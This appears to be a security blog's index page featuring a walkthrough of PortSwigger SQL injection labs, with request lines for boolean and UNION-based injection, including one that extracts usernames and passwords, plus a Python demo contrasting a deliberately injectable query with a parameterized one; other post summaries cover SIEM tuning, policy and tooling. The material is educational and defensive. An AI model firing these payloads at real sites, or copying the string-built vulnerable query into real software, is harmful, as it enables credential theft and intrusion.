Field notes.

Writeups, postmortems, and short essays on offensive testing, blue-team operations, and the politics of writing good security policy.

latest 2026.04.28 · 12 min read

Walking through PortSwigger's SQLi labs: from boolean to union-based.

A guided run through five Web Security Academy labs — what each vulnerability actually looks like in Burp, where the payload comes from, and the one defensive control that would have stopped every one of them.

# detect injection point
GET /filter?category=Gifts'
# → 500 Internal Server Error

# confirm boolean condition
GET /filter?category=Gifts'+AND+'1'='1
GET /filter?category=Gifts'+AND+'1'='2

# enumerate columns via UNION
?category=Gifts'+UNION+SELECT+NULL--
?category=Gifts'+UNION+SELECT+NULL,NULL--

# extract data through the UNION
?category=Gifts'+UNION+SELECT+username,password+FROM+users--
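The probe sequence in the snippet above, replayed against a deliberately injectable query and against the parameterized query that is the defensive control the post refers to. This is an added example, not code from the post or from PortSwigger's labs: the schema, rows and function names are constructed for illustration, and the payloads are written URL-decoded (spaces where the request lines use `+`).

```python
import sqlite3


def make_db():
    """Constructed sample data (not the lab's real data): a products table
    with one unreleased item and a users table worth leaking."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES
            ('Mug', 'Gifts', 1), ('Ring', 'Gifts', 1), ('Unreleased Widget', 'Gifts', 0);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 's3cr3t'), ('carlos', 'hunter2');
    """)
    return conn


def filter_vulnerable(conn, category):
    """Builds the WHERE clause by string formatting, so the category value is
    parsed as SQL. A stray quote raises sqlite3.OperationalError (the 500 in
    the snippet) and '--' comments out the trailing AND released = 1."""
    sql = (f"SELECT name, category FROM products "
           f"WHERE category = '{category}' AND released = 1")
    return conn.execute(sql).fetchall()


def filter_safe(conn, category):
    """Same query, parameterized: the driver binds the value, so quotes, AND
    and UNION inside it are just characters in a string literal."""
    sql = ("SELECT name, category FROM products "
           "WHERE category = ? AND released = 1")
    return conn.execute(sql, (category,)).fetchall()


def _errors(fn):
    """True if calling fn raises a database error (what the user sees as a 500)."""
    try:
        fn()
        return False
    except sqlite3.Error:
        return True


def run_probes(query_fn):
    """Replay the four steps from the snippet against query_fn and report
    what an attacker observes at each step."""
    conn = make_db()
    baseline = query_fn(conn, "Gifts")
    report = {}

    # 1. detect: an unbalanced quote breaks the statement only if injectable
    report["quote_errors"] = _errors(lambda: query_fn(conn, "Gifts'"))

    # 2. boolean: a true and a false condition give different responses
    true_rows = query_fn(conn, "Gifts' AND '1'='1")
    false_rows = query_fn(conn, "Gifts' AND '1'='2")
    report["boolean_differs"] = true_rows != false_rows

    # 3. enumerate columns: add NULLs until the UNION stops erroring and a
    #    row of NULLs appears in the result (a bound parameter never does)
    report["columns"] = None
    for n in range(1, 6):
        payload = "Gifts' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        if _errors(lambda: query_fn(conn, payload)):
            continue
        rows = query_fn(conn, payload)
        if any(all(c is None for c in r) for r in rows):
            report["columns"] = n
            break

    # 4. extract: pull another table through the UNION; anything not in the
    #    legitimate response for 'Gifts' is data the filter should not expose
    rows = query_fn(conn, "Gifts' UNION SELECT username, password FROM users--")
    report["extra_rows"] = sorted(set(rows) - set(baseline))
    return report


if __name__ == "__main__":
    for fn in (filter_vulnerable, filter_safe):
        print(fn.__name__, run_probes(fn))
```

Against `filter_vulnerable` every step lands: the quote errors, the two boolean payloads return different rows, the UNION succeeds at two columns, and the users table comes back alongside the unreleased product. Against `filter_safe` the same payloads are compared as a literal category string, so every step returns an empty result and nothing leaks.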
2026.04.28

Walking through PortSwigger's SQLi labs: from boolean to union-based

Five Web Security Academy labs broken down step-by-step in Burp, with the one defensive control that would have stopped each of them.

sqli·burp·owasp·12 min
// web sec
2026.03.14

Tuning Wazuh to stop crying wolf

A 4-week project to cut SIEM alert noise by 70%. The diff between rule volume and signal — and how I learned to write decoders that don't match everything.

wazuh·siem·detection·9 min
// blue team
2026.02.02

Writing ISO 27001 policies that engineers actually read

Compliance reads like a wall. Field guide: how I rewrote 14 client policies into single-page mappings between control IDs and on-call playbooks.

iso 27001·governance·7 min
// grc
2025.12.18

DLP without the drama: building and rolling out the system

How I built the Python + YARA DLP engine, why most rollouts die by week two, and the phased approach that surfaces real exfil without breaking marketing's workflow.

dlp·python·yara·10 min
// tooling
2025.11.04

Network forensics with a 200-line Scapy sniffer

Why I wrote a custom packet sniffer instead of leaning on tcpdump — and what structured logging unlocks for downstream correlation in Wazuh.

scapy·python·forensics·8 min
// tooling
2025.09.22

12 days of TryHackMe: notes from the writeup series

What I learned shipping 12 walkthroughs back-to-back. Privilege escalation patterns, the OSINT habits that keep paying off, and the rooms I'd skip.

tryhackme·ctf·privesc·6 min
// ctf
2025.07.10

Securing a FastAPI backend in under an hour

The four things I always set up first: signed sessions, rate limits, structured input validation, and an auth boundary that says no by default.

fastapi·api·python·5 min
// app sec
2025.05.30

Office security audits: the checklist that survived contact with reality

What I actually look for when walking a floor — beyond the vendor checklist. Wi-Fi segmentation, badge habits, and the three printer settings nobody changes.

audit·physical·iso 27001·8 min
// grc
8 posts published · 65 total min read · 5 active topics · ~2/mo cadence